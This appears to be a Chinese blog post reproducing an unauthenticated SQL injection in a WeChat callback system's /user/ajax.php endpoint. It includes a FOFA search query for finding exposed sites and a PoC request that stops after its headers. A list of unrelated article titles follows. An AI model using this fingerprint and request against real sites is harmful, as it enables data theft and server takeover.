微信公众平台无限回调系统 /user/ajax.php SQL注入漏洞复现

0x01 产品简介

微信公众平台无限回调系统是一种旨在提升企业客户服务体验和运营效率的工具。该系统通过一系列智能化和自动化的功能,帮助企业与用户之间建立更加便捷、高效的沟通桥梁。

0x02 漏洞概述

微信公众平台无限回调系统 /user/ajax.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="mb-5 web-font-desc"

0x04 漏洞复现

PoC

POST /user/ajax.php?act=siteadd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflat

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-18 13:46:03       66 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-18 13:46:03       70 阅读
  3. 在Django里面运行非项目文件

    2024-07-18 13:46:03       57 阅读
  4. Python语言-面向对象

    2024-07-18 13:46:03       68 阅读

热门阅读

  1. 依赖倒置原则

    2024-07-18 13:46:03       19 阅读
  2. Python使用队列在两个线程中传递数据

    2024-07-18 13:46:03       18 阅读
  3. STM32判断休眠

    2024-07-18 13:46:03       20 阅读
  4. Spring boot 2.0 升级到 3.3.1 的相关问题 (四)

    2024-07-18 13:46:03       16 阅读
  5. Miniforge 安装器

    2024-07-18 13:46:03       20 阅读
  6. 基于opencv的图片加水印实现方案

    2024-07-18 13:46:03       20 阅读
  7. redis知多少

    2024-07-18 13:46:03       21 阅读
  8. 【LeetCode 0069】【二分查找】求平方根

    2024-07-18 13:46:03       22 阅读
  9. 密码学原理精解【8】

    2024-07-18 13:46:03       19 阅读